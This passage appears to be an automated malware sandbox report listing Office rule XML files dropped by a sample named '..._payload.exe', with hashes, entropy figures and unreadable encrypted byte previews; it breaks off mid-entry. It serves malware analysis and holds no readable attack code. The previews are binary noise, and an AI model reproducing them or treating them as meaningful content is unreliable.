                                                                                                                                                                      Size (bytes):1730
                                                                                                                                                                      Entropy (8bit):7.89339425199831
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:Brb40d0VQrPoyvvEUUytFkQYsMv22QFIQ0rBWe7g5ndkUD:Vb3d0VQLlvvEUUyt/YsM1EI/We72SA
                                                                                                                                                                      MD5:44AF4F2327439F790763EC87D670F008
                                                                                                                                                                      SHA1:9FA0298825D7C22E481511C031CD06F3A8E59852
                                                                                                                                                                      SHA-256:DB04DC2E486DD9125A9B64BA488915C7AC98C7E6A82AC29302CD4A0369E06FF4
                                                                                                                                                                      SHA-512:77ED6C701CB9DD80510DDD6D04781C14C4469FB7ADF1EFDD6F0048C4EFAE10821511E98AFF1622CC90202120A37740AC0B9801695C89DBA3E15A5BA3B37748BF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml4].(..Z..A@8!.Y..|..j ......[...A..p.$....v.3..JG....|.g'..^...K.....I^.H.5.b...iSy.A..%.....8.R.....6..%.Z........8}.c..N..dE.D.Z.l.58Lz{.R}..or.H...j_)....:.....\,2a.e.....w.r...R..kj..)..(.....;L.E.&H>e....%...Z"{.n.d#.0.HWv..w.:..z..n.....H~.......Hr...`.......d..Y.G..\u...;.]z......H..v...s..\.Vn.AK..rDB..*.9....:.\.^.1VLxZU...........)m...g&kS....8..0...+..j%.P...D......os.#P..CX.~p....Y}...\..<.@/..-.2.........).lA.>*ABy.J.af{....-...IF.!zI.=..Q..........5.uG.=.o.4...J.N...@t.K.F.`...if.Z.R...\...l .o..L..T)..@..~..^.......5.........t...V>.........T. ...}....a'QE.... .Gb.....-n....?..........I..6..n.v..3i+....=.<}.d!...l......+..q'.^..h.....g..1....*.(...x.V...9........A..B.-......k.n.....&:{.............cCA.._.....6..........;j3.q..5.:pak34..n..o...l.......|Cjl./..21....t..>..3^.u-N..6Q(.Fq....}eL..c..s.a.gd.m6........O.1....Q^..g..!..\T.0..r.k.'..j..+."....|s....N...)t.)..\....aa....X$[...X..]....?..F...)..8C.Z..sro

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702200v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1693
                                                                                                                                                                      Entropy (8bit):7.888931439991718
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:MEm/PmX17XcsElJ4wbErOJjZUAJ6sY13mzKfD:vmHmlszlX4tsYJoQ
                                                                                                                                                                      MD5:40D1E4219423646E4FC9B39068A01276
                                                                                                                                                                      SHA1:D65B763F765E5561916B46A46BA5B34AF83DB677
                                                                                                                                                                      SHA-256:59482F1FEE683AF2BE77D7144135ED4833BFA442E6F7D8828258BDDDF65660AD
                                                                                                                                                                      SHA-512:EC7E8FD41365C39167527C7644EFE31F08B5EC7DA78003694C6F0F6AB2E4A46AE2CAA4F367FE1A9A507A98FDB0894F03C49B84B0889AD80B1B2A8F70F73C69C6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..d."v....y'..j>n...!(.Z..Mr.x.$].U.....1......bvvyp.\...*..}............l.R.B..{..l.^...CPI.......t.|;dp....d.#.yE......0.....Q.z........_"...lP.7.?...T.F..W..B.Z.6./.Pu...$....:...uy..:.DL...-5..D....x!...R.1jV@.E....o.....[.z......c..PR.[my.......|.......&..9.G#..V.c....J.X..OHe.B.c.2|nW.nmu.(..q......c..4.>..J K6f.... .a0.U.Z.....^....&...l...S..I..6..............R......-_.u.5+.....j.=Vof...i;.8....qVu9P0..M..x..QK+o1-...OV..e.*O........x.AD..d36....;&'X.|.....\H.......4.W.Y.....s.=..45H....r..../.....'.n...p.O0.....7..........m....!Xh.....].xN!..j wn0z.Rf&.d..Z3v^H......$..7.d.7-...pU..Y...a.Tnv,.C....D.iq#@.6m.><...<..o..H....h-..5[L.......J..>.>...&+. ...h.C.~*..gFyE..x'K&.......s./.=...D dD.....\ey.#3.2..c3......>...X2..k........v..G.....Y?....$-&..3)...yaGq.D.h.h...MQ..W$...P.".(F.0KE,.[.1..Em..@.n...L.,...N.f(7B.........XJ)...n.YK.-`8Tg....S$.].z...f~.F..7.[NQ.?...^yp.~g....x....XH..&B}..=.4.6...<....b.n.NJAaP....~..{.....Y..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702201v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1730
                                                                                                                                                                      Entropy (8bit):7.885206134261562
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:eRZ6wmcG3PwqrByWByCvXnXnMLPzrRe++4JqUlnvwD:YZJmV/wq9ZZHWPBep4J3vs
                                                                                                                                                                      MD5:0749C394735EDC26D484DBCD8F2A4FA9
                                                                                                                                                                      SHA1:6A8FA8919960E4CF7DC170F47ADDF5B62D6E1567
                                                                                                                                                                      SHA-256:B248A5C826A1CF88605A66A203B5CABC94111B0F777A5F74A82D0D575B21D89E
                                                                                                                                                                      SHA-512:6AD9C21D596E3DA2D71CDB7E2C64BFC41F980D05575C7AB175341E00C34EF7E226EA127138748D963CDF7DDDC865DD44032F9657173737EEF47FCCF72FBEEBCC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...F...M.cWM...-..V..h..J..?.d..A....7-.X....p@H..|.j8M$..8.".A.N.B..*.0........h.t.%..qujV..Al.g...#.k69r..W..|.>..K.`.1F...|...$..-..ohx9....|....,...l.m.m.\4U.A.(H....i....i...*E.EU.@..6..;Z.....GA......e.....:pZp....h>C......:hYV.w..ig..\{c...(...53m..93.5...]..d/.s....;d-CcQ....=_..'a..7..=s:...;`".w...t..NK..."...;T..|.~..........,..U.Y,..a....^q..C\;7..g.L5X...ID..vl......Rn.d^.W"gF......p.F.5.%.5..I...q{....![.... ..+...S.@65.Z.]...g.n.............G..m.....8.g.].3/.a.Z.tr...j.S.....o..3..0Sr.. ..].?)J./..7q^9.!nR-.T..Te...ME........X"..4....zL..&"=...R.....l..k[.N.......r.M?.n.D.(...#Qs"..}C..[...D.K..^...{f......[<m+......QN{@....n.C..-......(....p0.U2...t.....+..%.&UX.J..9o...l..#...%fH."..b....mX`.].....[.Br?.....^A8. h.*?kO.....G.n>.....@Z~XO......$.9......~.2......ZY.lQ..9..j..Z......7..-.E...E.~...U.......X...OAZ.,e..u+.}....Zd._..$.....-k.....W .............. .H........%..."YA.;.Z..+8.g.GJ..._..(.6.{..O;u2.z.heO..O.M....T

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702250v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1685
                                                                                                                                                                      Entropy (8bit):7.89411422147038
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:QwJD3RkCCIeS/JaebCqNLARXth+RmuHLJCYKVPUz1ij+WWf2xwGyBVF9UeIQ2bD:QED3Rk3IhBtOXkmYsY+Mzi+WxibGDD
                                                                                                                                                                      MD5:F4C704AC4EF5244F07BE72FA0D4DEFE8
                                                                                                                                                                      SHA1:4C64809642D71451D843A7E0EED078985245DED7
                                                                                                                                                                      SHA-256:0457005DAA0C0FB1DA90D274AE1A72F3A1E69B3655CFA13C8E1DC433CADFC8AB
                                                                                                                                                                      SHA-512:DF2D29C6D3704D244D7829A0385C89147611C29B754263708B7EF031512D5EDDED092B6C03A5E95499D191CBC0514A0328CD4EDFC2F13214D12045178AD5F938
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlS2.f...4.........6..fe.7...6oGU...d..c.".)..9b4Z-V5.Lp...N-.....I...q........V....|...?..z.N...7.#....Y.S@.\[.....R....+..}P(Onf. i..E..P.......q..i/.%...@...x..w...D$.]^f.2....,...A.....?e....5........SV.\|.2(^."+.8.F.7..\M..S*..[..3......O...`Q.y..T....q..p.....R.q..im.9.5.....yE."r.;#..W.....@#U1;..J./G...#............X....>..Wi.L...A..W.g...f+. H.T...d..,:.w3os...!.n.T.x.0.@./........z..0.N...tK.#....5.U.pR4..:..h......F..M/'(....(w....v..~.t...b....=1.z..6(*.'....W..^.}*..s.4#...l.Oq<_. R...L4.....|... t..............H.^..Z.mWA..|Ng&...#..c..['Z@c~. Y.....7...W."}.....s...a_..D.@......././.(...H.._x._t..V..\..V........JI*..T..@..J|.9..G.N....!....8Y..c....Y`V..#8...k.}..qa-f.n.I...J....'.Y.t..W../:../...W..N.^.Xj.Lrk....j..Y....*.<...%.(BK8..(....i.....L.3\..{h\.:......&f=.n..D6wkH.|>..v......g..~6...$..1..MH."Z.c.eMp.^.....V.-..vC.......Z.v.......*.*.m.............JxZ.S;.f.........O.....p...Gha.+k..Ul.9..u...hG.F..".<=.].T

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702251v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1722
                                                                                                                                                                      Entropy (8bit):7.881034459184004
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:/48WEi09MdYBGmhmlLeNpEMhcxc2Zq6kA8gOAPH2ED:Hn9CcGCsYpEMhcqZ6MZ8Hb
                                                                                                                                                                      MD5:1AAD6BBF2294162391089EBFABC23C5B
                                                                                                                                                                      SHA1:197562D9E7B748398ECC40F55404A0E459003AA0
                                                                                                                                                                      SHA-256:353691DACF8EB84CB78DF1728F83D6075F9EB58C87A6F9029A8863E80C2E0193
                                                                                                                                                                      SHA-512:D2A61763957BA5361411462B653939BDC16FC82C58CDEBF5F7BC6335F72CC34CFB2B674B5B786A0EBD7A3B59DE054FD00E7B1234882C41A7E0F5D22751B74D15
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.z..|.........|F.-..#.[B\or.F...-."%..^..H.{.H...R...@...{=.=6.:1.:......k..H...:.N...dX.KQ...INw......t.jQ0.m.....E./j.4...-.X".:4..',..&..T.....]9k..e9.F.U.....0a...&.01.!.L....@.?X..R..a%.J..#..Q...Edr.....!...D.7.....?....8../...+^...`.7E....s....h.B~.=...~.W..J.Z+..kv..T.U?....S..%C.f..R....?y.2C.WpTZ..on......}....D...d.....O)...o.7./.../......!#M.J.2.]....S..+fh.wR.p=C..[.I.3n.....7.....Y.../..!{z...% .I+.:.....h...b@....<WB....3....Dt..sY..m.........b....u..|...l.Q.G\.AS.7o.........=....^....?+...0A]?SU........(....Pc.s...e@....4.r...w...v..q...i..#.....=H.....{.]H;....W.K..Q.w.?.)X&..n..U<6.p..7. sZ.!8..0...\..W.2%...M...K(-].i.+..=...'..`2.|..,X$5.C..........o..:...B....:..h..(...N|*.W5........zGBaI?n.I..u.4..jt.X`....2..M.a..^..Y`;jh....|.]...s..M.+b,n(.f.]...;....l.ts..X..Z6........_....9"$./<.8.p.S0l...g.Po|...8.luXp.+.f....T.z.|I.5}.>...V%.\..*.5..t.M....><..HnQ..Q0E....b.p....x]..<..T....r^Y.....5..@.C ,..S..B..R

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702300v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1695
                                                                                                                                                                      Entropy (8bit):7.899641847146831
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:zGNftQv9kWksrQW95mSv19uB53yjpwEw+DEZns057CURT4BeQraHWx+pZx2bD:ziWPksrTXlt90x+DEFVExBMpUD
                                                                                                                                                                      MD5:24CE35F815B86D6FE0F86F8B6137386D
                                                                                                                                                                      SHA1:479200D92EE6B948051A1C56BE21FEA29D1A990F
                                                                                                                                                                      SHA-256:6797F41A00D572EACB5E92136570ABF2FDCFD7BF562412DC222861DF1D57A122
                                                                                                                                                                      SHA-512:01C6F59F80E868B1177969548297DE29C5F05E6CAE2D4362D425FCDE1D7C3787B318BF11517A9C26DAC325E00103E226F24DF91CF3CD802D2514F419DF06B454
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlo.uCu..]....`.nd....$b/Q.....c^S&...bYcn.......2.7...K.|.H..n......`.}.d..(...c...pS..=.m'..~...@...].'..ch....]w ....E%...*#.lq.sns..l..Q3.....l.g.N...A..f..-...:..../o.|...X]..o.;..$..tO..e.U.......o.r....+`.!._`_5y._.G..T.;.0...b.0z...M.........-..m.S.,.'K&.H..&...%y;3..5.a.<...,.lG.9#...,...rlL."...H...G..5..y.n.S].......'t.....{.....|..'XV..=r.......}i...$..x.~....6...2......]...>...^..,i..~........aY....B.....-f.y.D..tz.Nxz..-.]Q<..'X.,..-......r.E.s...r0......Y...L._.@..+....!.......+....o8....r.54.c..I.JF"...&5.b......bG.5.`...a...J..`p.Yk%..{..Z.......U:h7p.Y ...H-#.N.*..m.^]........>..@.N.)....A...U..c....p.U.......(...u..[.K.%..A..&....O.....3o.."...)..$F....m.n...1(r.O.m.H..q~1:m.f....`M..j....N.&<V..X.L....KD.?*....J.d.4.'F.=.....+w.R.!..(s4t.p...p......$.6......>m...?....0..F..qVD.Rd9..{....i..G{..1$..?j.O.$._j.{......W...Ue.P...J.O....P..:.k.2Kq..R.!...P...5.5.....8.dkpj...9'.[....c...4...M.....rtn...w0.K.-..k......

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702301v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1732
                                                                                                                                                                      Entropy (8bit):7.890689579068532
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:aSNDFndFbzYMXu9F7YRknzhftGqQYw8VPD:aSNxHb0MXuD7zxtlVb
                                                                                                                                                                      MD5:794930E31C213AD0131F42EEB14A8254
                                                                                                                                                                      SHA1:0727A54105D58A7726F4FEC039CC7DD7BC93E774
                                                                                                                                                                      SHA-256:D107FC77C4CEC281456252989181488DC1E5C393E8965F907AB0D1546248F1A8
                                                                                                                                                                      SHA-512:A5613A96567B491BF9085AE686CD796D03306AF9948B1B09952686D360E5BD19861F185FFB3D364891DB9C0E6165E2B6C9A02ECC72A7037B554C0BBC418A249A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml<6:.#.........V.....U.`....!.M`.|&.b.O...>(....97K.b.e...fB.&o..y.\..H...YII1.[7>..9.......!...;.5..I..Z..n..!..D..=.....@...t.z:.x.v..j=...W.J.u.P}I...G..h&k.....Hp$../..]....%X.(.k...Fl.p>.v.s#.1.@8Y.V.$...V..3-D...SAeP...Q...z.l...~..a...V@..f|.i.SL.......G.......}9$...a..Po.:N..|j.D....N.C.a$../...?}K.4...C.../.m.......#..E#.s..........4g1L...D..x..j..:<..\PalxK...&..5.."z.eY....<,:g.kP.q...g.m.7vR.iSv.....=.k.ej..R.%ydI...|&z..\.......s\.......$]...q.9Yf...:'.......A>....p....a....-N......<p......CG.7.K..X..h5.mA-..C.N.2...2..k.H..e.f..J......Gz...w#$.'.R.....+p..).g.H.D.V}|....I.y.~%....=....'.B<....<.^..s.M.F..^...k[.j.W.*....f".y.Dc#..>|8.e..-..A$@.x.w.....b......*..(.>.~..yVE.:.v.F..-I...).k.|...b.u.YT...Op....}..UG...s......<_k.k)........u4 ....'E.C...gt/.8a.m...^..+.!Y.h./L...a\..i...V..........s.*.B..U^.#.!.)e@>...v......2...._:...g.....n....fxhO.`.D.2JcvV....{..M......[y..U#u..;..9....c..o....u.c.\...za+..9r.|6z...p...g.D....b...ya.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702350v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1691
                                                                                                                                                                      Entropy (8bit):7.890922771867735
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:zr49Hzqj7rq7rniuRCIfKeJjNGXswlueGg82560bug5ghkvRPVJaKTgsyMoZpYVW:z9aUI75JwM8606gehkvR9pdoZpYgD
                                                                                                                                                                      MD5:F12BD28872B2A34C551D7754A99834C0
                                                                                                                                                                      SHA1:BC09F8F43F687B95D3792A593559E4CB47A83787
                                                                                                                                                                      SHA-256:8A28AF1121B8E00A9EFBB9AC378ABF1546D4493662F348A3BFAB429289576B42
                                                                                                                                                                      SHA-512:83E79926D9C5740B4B84F26025702051D32CE29038C21ED46BA52C291009909E7B807BB4456F2BCE76FDE2AD73FB1D77705FC09BF271E3C099FA4E6E0D288E69
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.s.0.hE"..........|..Ih..].....p.x.....O,...S.@............V..."a..1(...N.8..k.i.U......m$.Rlo......~.t......7.....+...5|3.(...]... 0.....}....PQ...4.....V.......?@....(..y...of....D?x.{.....;............k.c...Lk.MJ.d..q.Yn/bD..=.Q5..Q..!....m....1X..:.8.1b....gk.......'...NI..!.,.e.T...i.4......:1k.P..T.S.<..V.P.!..j.w....h.H..../u..{.=.n..5U`G6..e>......bby.st...2L.A.J2,...Y..^.0 .@.S..]....c.....8_..5..^...5[x("}.....5.oU...Z.1.4..a.{.s.~P..xO.....G......z..R.`.........X$..\.D.d.....f.D.p. .p....~...r..+Y.7@.F.s..3.Ls.E.S6T.../..fJ...g11_W5.....[g...L$.xP.....X....>."....z.#....rh/......TV.....$...s[R.\.7Dr...=..... *e.t..e.j=.....0f.G,..o.g..l....o..Ks3..."F.c...s5T......A.xMh..@.}60FH.cY(#.4.....R..[}.......7.R.`.9.k./.&....ck......u.zJV/.[..7Jj........3....5.......d.....!)kh}...V......+O.5.?..Ky5...<oJ...L..L-....C>......qKG%..k...1...K.q.F...q...kr.../...e.1:.Jg...&-.-..x....#z.....jJGH.#+'0..[.`....g.S"]...MM<.....a^`0

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702351v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1728
                                                                                                                                                                      Entropy (8bit):7.885929439231136
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:7XiksnDWV5412BYB2ZrmoESRvdm0DTCinXtD:7XiksDWdBYEKoEoPPnXV
                                                                                                                                                                      MD5:7DD3A329F29B392A029064D1A296531C
                                                                                                                                                                      SHA1:21D5FE28BC6E73644311A5708367E30B4E243DE7
                                                                                                                                                                      SHA-256:C6B282A9EC18C392F10A6A84B45CEA62BCAA6FCDCE58ACC2F0BAF165D87FAFFF
                                                                                                                                                                      SHA-512:2ACDD05541279C01551F25F691B2DF45CBB26B17F6EF3B7ED90089AE79849ED73A01B57276369937393C703BE6A0E8C1FAA777DF2EE9BBA8D8A751E71F84F20F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml3?..p....',.....,.........Z.\W}..>a........!........wm...B6..@.<...[+...I;...s>pp.D.....).>-.1.`S.N"..D...o..4V.....?Ck@7qw..7....g..6..a.....3............N.G.?..o............)o..5......-..MV,..;_.m.9...H-}.......@.]..~.~P.}.'.b.....& ._t*=D.>..oQo..C)U.sqD...F.)Q]&.~.....jH.3~h.t...pB....n..L.....4Kn"%...Y0..+..#.K..<1.5.d........B...0..t.*]...el.......p. ..{.x.@xV.3.b..K..tc.r....N.C.>..zl.F9A..f'-.......2........eZ.|....$.y.....J.....Y..L......l.S....)~j|..e.!...s..8....@..R.+...{..O.g...T.&B.}...f.......x...nAC.>.X.P.....(...."h_.[...c.........6DcVO..&..Z.8.k..........B...(.D.5....O.~...g....Fg....C......X..L...`o...:*......6Q..yq.....8.e^.(]V..(...e1-..A....rHp..U...sm.W...:."m..."s(....i/A.u."...9i......c.x.HX.K.......U.3.k..DN..5..Q*m.1..*..S.&.X..^...@.....g...z..`.E...f..N.f..k..!B.9"-l..j..........lv.]....E.:....#.8].Q...}..4o....x.h..uDy.~...(P z.p..8....R.t...q...wc2.~..J....[*.TF..\.-......<..o..........'b.#.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702400v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1701
                                                                                                                                                                      Entropy (8bit):7.888972690868018
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:cM+o/F85yUQtx4+ZflGk+xuSP3UKdVEqIXXyhpj+dXw28Kpafqdpew2bD:p/SyUQPZft+QSPkKaqIShpj0wmie2D
                                                                                                                                                                      MD5:021BBDC1675D983F86A0C3C05BB68BBA
                                                                                                                                                                      SHA1:54C243737CCC2C3093065DAEC1BE360DCD1B69FF
                                                                                                                                                                      SHA-256:2950969931AF0CB32A29629A9B7B9EFA77FF2A321CF887EF083C2894206F1A74
                                                                                                                                                                      SHA-512:B8F4B98AFBCC42BB643401B75DF61B8E547611DD82ABEE769900DBC74324159E68ABCDD30253B605BD6DD8B82950C9E7C1AA5216B22C7BB853ACAA0043DB3D70
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.Z^F.F.Uk.*u..^Sy,._.....{........n.v&.^.2L.Hvz....i..V....N.*(]._.c.c.....f...sX..H.......'TA..F.j<.....'UBG...e*g<{0;...l...:'T...........Rr.Y,|...mg.@.|.\....FY.\.b...x.......+..f.|p8N....rK,.)~iH.V|...;!.....\g.!.l.;...'.T......>=.6....ui%e]?.5..X..uY.wV.[..m|.`...*..t|.c~.TK!y...C....o_.R..u.<y...Q$.{...c[.....D...e/W[dO.P...3...Vc>h..b.=.W..wSvR...W....r.0...!M....}.,.#.m...]Xvt.`.....X.Qz.G.. 3|.tC.4%..k.s.z..W?Q]....6.H...v..@1..#.t|.....w.D;.J...,2z..Z.&7..u.d"..n7..'.rE?..."._w..E.c..9fl.+.fwwk./+...*..*........}...rh7z.VZ...^..:2D,:...'.f..}t...M.7J.../.e.%......j?2A..iz.5@...5iI~..:...U..?k....j..P..].L"A/}..v..+4k....8N.:.a..(.[..<T.x..j..!.m..nK`.......L9.3..'...1u...=(z.|........P$P..*nv...&..N...Y....}...M..7...............i..E....@.....ok.#..T.@....+y....7|..op.FEC.w..u..&..<;...Fm.....l............g.?..+_.h!J@.....vTP. ..V..3........Q.<.\PY.-tc..fi...=.7.L....9..@.w5e@}.TCt?..8...K......Y.Hn.......d....X.&...IC.2...8...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702401v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1738
                                                                                                                                                                      Entropy (8bit):7.894863191633618
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:NwnfsqQiH5N8iE/wdxS6rYGudjxAgk4PttwBRjNz311eBGqy2Q0o2bD:sUqQc7TEEtud11k4PbwBRNz311MGGbD
                                                                                                                                                                      MD5:64113D28CAD9DDF0A829A6BE706D986D
                                                                                                                                                                      SHA1:BA0E220D543B89017FAF31D05580258ED5B147A2
                                                                                                                                                                      SHA-256:721D00BD874E6A377AC19972873E0DBCF861470D28F3CC960474F185C860429D
                                                                                                                                                                      SHA-512:8CBE91D39F6F7881860EF7A911DB344704A87B8DDC82E952620A9B2290DD372DFC6DE71308E2F22A587A62801DC3C2492F29774815CC61AAE4E6CBE39A0FFF7A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml)/..m1....c.{?..s.....,.J...nzD.q.(.........O..P.;.qT(y..w..q`yo. ._...5B[.x/@.u..}V.(.;y..~".aG..a..&.>.4..v..~.]\...5...<...l.X.....q..u.e.o@QB+.....YX.dx.#f.../9w.i.|....Y....f4U...B..%..W..]%C...^.C9{.3.PCE....u.y....0..".o..gI.DQ8.AUT7p.3.... ..'..b..xW.4.R...3......i<....I.J.O{j....R.'_..,..[V..zB8.~.u........x...V.vbB`..R.. W.9.=Pw...kk...S..o.k..S?....W.......|..]a_#{+..f(....5...T.X{...G].x..q.&Tt.....y....3.L. 1.NE.`.W...t&.../..5-......P..N:\.w-.....jY9=.......=....O2.._..r.o....E........~.uG@3V.Rx.V.3.1.......#'....Z!G.z...v.^.Cg.~$.Fh-....]...)...9.......j....(..$.s7.|.r. .!..z..'...t:...S.A=Y....t...Q..7'C..J..9.._6gW..._..<A.K..DQ.}f..b..0\.._..I.u....Y".t...9...u5$V....m..J..$..._.........U!..t.9G..Q5`...Y....l..fA...].lP.,..3r.2.c@...L......[=([..... V.3;[.P...T"4.'....G>..l7.3....8F"...~.C..J.S...g..b..(*y.e..RDRh.*..@..Ipq...!..u............8d=..TX.k..;..u...].)..#l.......a...E.P.gnu.....Q+g..7.....R.e..M.fo....Q.......x..k..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702450v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1693
                                                                                                                                                                      Entropy (8bit):7.89596539596861
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:EOyX0sD6sBbjPlzU1V1HsvdUFYphTGJLkuKrR+lGuI/v0ydvvh9PoLk2bD:9yXFD6sZjPpUavuSph62sU/vndvPobD
                                                                                                                                                                      MD5:A2F3095FF4497995A452FD1890937E56
                                                                                                                                                                      SHA1:05529D2D5C85A8423F10D8593178723C5B085518
                                                                                                                                                                      SHA-256:3AB33AC5706C34EF919ADD13ADC4509FD20123FAC4C0BDA44F45279E635B974A
                                                                                                                                                                      SHA-512:2253BC339EC48179BCD010EE56DD8AA7B3FF08A33014FD7AF2C4F2F73BE5859233F023C7FDFDE325DB35DA940A72CB714F3A1FD094E9EF6E4DFFDC4C48618C62
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.....U..'.+..K.d0..!.$.!...R..EChm;...... ......L.B..UQ:.|...,....`+.0......[eH`..Y_j...o.z.J.3...+.jS...M'......0.....9.oaD......c....B..H..t.?Q...... ..-au>%....Z.T.. 6......../....; 4..d....X9...{..j.U..w..~n..-).S....5..}/..F......L.{....].*..fcjR.A.3^Z...u.<.....eh....D...y..^`.l.........*}.......?..U.,q.....G0>..$<a*.c.g.n.y..6..B5ji...j7..$.x.pp..........$.....t...c*.....e>F..p.g<.:..u..*5.g....a..e;...n..b.....4...-b...o*....t.$...6.r..].i...p|b...;J..tMtP.x[.1.Q`..CN@..e.........Iw4]...k...m.yC.*.y......8.;ew.VJ.1.j.....N...} l|jk..5..S.Y.B$.JG..8.|...R..*...&1....P.k.=FJ.:x3....b...eH...a)5... .(........2.....[..^....[s`.$..=.g?.;5...e.|/Vts...p".x.[:g...Iu....B.,.....5..y'....u.Xh.p2?..Z.2Lf...8..>...?....".!...N...q?;.M.;......K...3.;R.).X..k.'5.{r..vI.JRF.R..i...*.#..<.K....YU)bA}O.!o.|b.:x._g..A..`.H.fk...7...../p....=..Ob.-.....;8..H..0.T.c3#...U.o.W_..G....\.jM......w.&.pt_0..R.SCX`L.@'.z..h.BX.=..0.Z.=.6..wEl...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702451v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
